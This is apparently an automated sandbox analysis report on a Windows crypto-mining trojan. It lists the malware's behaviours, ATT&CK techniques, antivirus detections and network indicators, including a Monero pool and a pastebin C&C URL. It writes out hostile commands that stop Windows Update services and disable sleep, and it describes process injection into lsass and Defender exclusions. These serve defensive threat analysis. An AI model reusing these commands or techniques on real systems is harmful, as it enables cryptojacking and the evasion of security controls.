                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D1B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_00007FF68D3D1B54
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165E7960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,23_2_000002D0165E7960
                    Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Windows Management Instrumentation
                    11
                    DLL Side-Loading
                    1
                    Abuse Elevation Control Mechanism
                    1
                    File and Directory Permissions Modification
                    1
                    Credential API Hooking
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Web Service
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API
                    11
                    Windows Service
                    11
                    DLL Side-Loading
                    2
                    Disable or Modify Tools
                    LSASS Memory1
                    File and Directory Discovery
                    Remote Desktop Protocol1
                    Credential API Hooking
                    1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Service Execution
                    Logon Script (Windows)1
                    Access Token Manipulation
                    1
                    Deobfuscate/Decode Files or Information
                    Security Account Manager24
                    System Information Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive11
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
                    Windows Service
                    1
                    Abuse Elevation Control Mechanism
                    NTDS431
                    Security Software Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Standard Port
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script813
                    Process Injection
                    2
                    Obfuscated Files or Information
                    LSA Secrets2
                    Process Discovery
                    SSHKeylogging2
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Install Root Certificate
                    Cached Domain Credentials131
                    Virtualization/Sandbox Evasion
                    VNCGUI Input Capture3
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    DLL Side-Loading
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    File Deletion
                    Proc Filesystem1
                    Remote System Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt4
                    Rootkit
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                    Masquerading
                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                    Modify Registry
                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task131
                    Virtualization/Sandbox Evasion
                    KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                    Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                    Access Token Manipulation
                    GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                    Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job813
                    Process Injection
                    Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                    Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                    Hidden Files and Directories
                    Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583518 Sample: hiwA7Blv7C.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 65 xmr-eu1.nanopool.org 2->65 67 pastebin.com 2->67 95 Suricata IDS alerts for network traffic 2->95 97 Malicious sample detected (through community Yara rule) 2->97 99 Antivirus detection for dropped file 2->99 105 15 other signatures 2->105 8 hiwA7Blv7C.exe 3 2->8         started        12 updater.exe 5 2->12         started        14 cmd.exe 1 2->14         started        16 5 other processes 2->16 signatures3 101 DNS related to crypt mining pools 65->101 103 Connects to a pastebin service (likely for C&C) 67->103 process4 file5 55 C:\Users\user\AppData\...\bzqlyietdwsj.tmp, PE32+ 8->55 dropped 57 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 8->57 dropped 59 C:\Windows\System32\drivers\etc\hosts, ASCII 8->59 dropped 111 Writes to foreign memory regions 8->111 113 Modifies the context of a thread in another process (thread injection) 8->113 115 Modifies the hosts file 8->115 131 2 other signatures 8->131 18 dialer.exe 1 8->18         started        61 C:\Windows\Temp\libtqlibdoyd.sys, PE32+ 12->61 dropped 63 C:\Windows\Temp\bzqlyietdwsj.tmp, PE32+ 12->63 dropped 117 Adds a directory exclusion to Windows Defender 12->117 119 Maps a DLL or memory area into another process 12->119 121 Sample is not signed and drops a device driver 12->121 21 dialer.exe 12->21         started        23 dialer.exe 12->23         started        26 dialer.exe 12->26         started        123 Uses powercfg.exe to modify the power settings 14->123 125 Stops critical windows services 14->125 127 Modifies power options to not sleep / hibernate 14->127 28 conhost.exe 14->28         started        34 5 other processes 14->34 129 Loading BitLocker PowerShell Module 16->129 30 conhost.exe 16->30         started        32 conhost.exe 16->32         started        36 16 other processes 16->36 signatures6 process7 dnsIp8 75 Contains functionality to inject code into remote processes 18->75 77 Writes to foreign memory regions 18->77 79 Allocates memory in foreign processes 18->79 81 Contains functionality to compare user and computer (likely to detect sandboxes) 18->81 38 lsass.exe 18->38 injected 41 winlogon.exe 18->41 injected 43 dwm.exe 18->43 injected 45 svchost.exe 18->45 injected 83 Injects code into the Windows Explorer (explorer.exe) 21->83 85 Creates a thread in another existing process (thread injection) 21->85 87 Injects a PE file into a foreign processes 21->87 47 svchost.exe 21->47 injected 49 svchost.exe 21->49 injected 51 svchost.exe 21->51 injected 53 3 other processes 21->53 69 51.15.58.224, 10343, 49703 OnlineSASFR France 23->69 71 xmr-eu1.nanopool.org 54.37.137.114, 10343, 49700 OVHFR France 23->71 73 pastebin.com 172.67.19.24, 443, 49701 CLOUDFLARENETUS United States 23->73 89 Query firmware table information (likely to detect VMs) 23->89 91 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->91 93 Found strings related to Crypto-Mining 26->93 signatures9 process10 signatures11 107 Installs new ROOT certificates 38->107 109 Writes to foreign memory regions 38->109

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    hiwA7Blv7C.exe61%ReversingLabsWin64.Trojan.Leonem
                    hiwA7Blv7C.exe100%AviraTR/Rozena.qmghx
                    hiwA7Blv7C.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp100%AviraRKIT/Agent.dvyic
                    C:\Program Files\Google\Chrome\updater.exe100%AviraTR/Rozena.qmghx
                    C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp100%Joe Sandbox ML
                    C:\Windows\Temp\bzqlyietdwsj.tmp100%Joe Sandbox ML
                    C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                    C:\Program Files\Google\Chrome\updater.exe61%ReversingLabsWin64.Trojan.Leonem
                    C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp87%ReversingLabsWin64.Trojan.SilentCryptoMiner
                    C:\Windows\Temp\bzqlyietdwsj.tmp62%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                    C:\Windows\Temp\libtqlibdoyd.sys5%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://crl.cloudflare.com/origin_ca.crlv0%Avira URL Cloudsafe
                    http://crl.cloudflare.com/origin_ca.crl)on0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    xmr-eu1.nanopool.org
                    54.37.137.114
                    truefalse
                      high
                      pastebin.com
                      172.67.19.24
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://pastebin.com/raw/mJdpKdhrfalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                http://crl.cloudflare.com/origin_ca.crlvdialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://ocsp.cloudflare.com/origin_ca0dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://pastebin.com/raw/mJdpKdhr&dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://pastebin.com/raw/mJdpKdhr--cinit-stealth-targets=Taskmgr.exedialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.cloudflare.com/origin_ca.crl0dialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          https://pastebin.com/raw/mJdpKdhrbdoyd.dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://pastebin.com/raw/mJdpKdhrTaskmgr.exedialer.exe, 00000034.00000003.2171682791.000001888CCB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.3325227158.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135784569.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                https://pastebin.com/raw/mJnit-dialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://pastebin.com/raw/mJdpKdhr4wOdialer.exe, 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://ocsp.cloudflare.com/origin_ca(Edialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.cloudflare.com/origin_ca.crl)ondialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/wsdl/lsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.cloudflare.com/origin_ca.crldialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://xmrig.com/docs/algorithmsdialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://ocsp.cloudflare.com/origin_cadialer.exe, 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000001B.00000002.3325227158.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135784569.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000001B.00000002.3324859530.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135759340.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://pastebin.com/raw/mJdialer.exe, 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        51.15.58.224
                                                                        unknownFrance
                                                                        12876OnlineSASFRfalse
                                                                        172.67.19.24
                                                                        pastebin.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        54.37.137.114
                                                                        xmr-eu1.nanopool.orgFrance
                                                                        16276OVHFRfalse
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1583518
                                                                        Start date and time:2025-01-02 23:25:05 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 9m 9s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:46
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:10
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:hiwA7Blv7C.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:882b403dcc4c6928de9d4a86bf4fbb650909485e828cba37258d68be81340739.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.adwa.spyw.evad.mine.winEXE@68/18@2/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 86.7%
                                                                        HCA Information:
                                                                        • Successful, ratio: 61%
                                                                        • Number of executed functions: 68
                                                                        • Number of non-executed functions: 352
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
                                                                        • Excluded IPs from analysis (whitelisted): 40.126.31.67, 40.126.31.71, 20.190.159.71, 40.126.31.73, 20.190.159.68, 20.190.159.75, 20.190.159.0, 20.190.159.2, 13.107.246.45, 4.245.163.56
                                                                        • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                        • Execution Graph export aborted for target hiwA7Blv7C.exe, PID 1908 because it is empty
                                                                        • Execution Graph export aborted for target updater.exe, PID 6556 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • VT rate limit hit for: hiwA7Blv7C.exe
                                                                        TimeTypeDescription
                                                                        17:25:52API Interceptor1x Sleep call for process: hiwA7Blv7C.exe modified
                                                                        17:25:54API Interceptor33x Sleep call for process: powershell.exe modified
                                                                        17:25:58API Interceptor1x Sleep call for process: updater.exe modified
                                                                        17:26:30API Interceptor343024x Sleep call for process: winlogon.exe modified
                                                                        17:26:31API Interceptor261918x Sleep call for process: lsass.exe modified
                                                                        17:26:31API Interceptor1558x Sleep call for process: svchost.exe modified
                                                                        17:26:33API Interceptor329262x Sleep call for process: dwm.exe modified
                                                                        17:26:37API Interceptor1849x Sleep call for process: dialer.exe modified
                                                                        23:25:57Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        51.15.58.224gaozw40v.exeGet hashmaliciousXmrigBrowse
                                                                          LfHJdrALlh.exeGet hashmaliciousXmrigBrowse
                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                              aA45th2ixY.exeGet hashmaliciousXmrigBrowse
                                                                                25C1.exeGet hashmaliciousGlupteba, XmrigBrowse
                                                                                  8EbwkHzF0i.exeGet hashmaliciousXmrig, zgRATBrowse
                                                                                    file.exeGet hashmaliciousGlupteba, SmokeLoader, XmrigBrowse
                                                                                      file.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
                                                                                        file.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
                                                                                          file.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                                                                                            172.67.19.24rrats.exeGet hashmaliciousAsyncRATBrowse
                                                                                            • pastebin.com/raw/KKpnJShN
                                                                                            sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                            cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                            cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                            cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
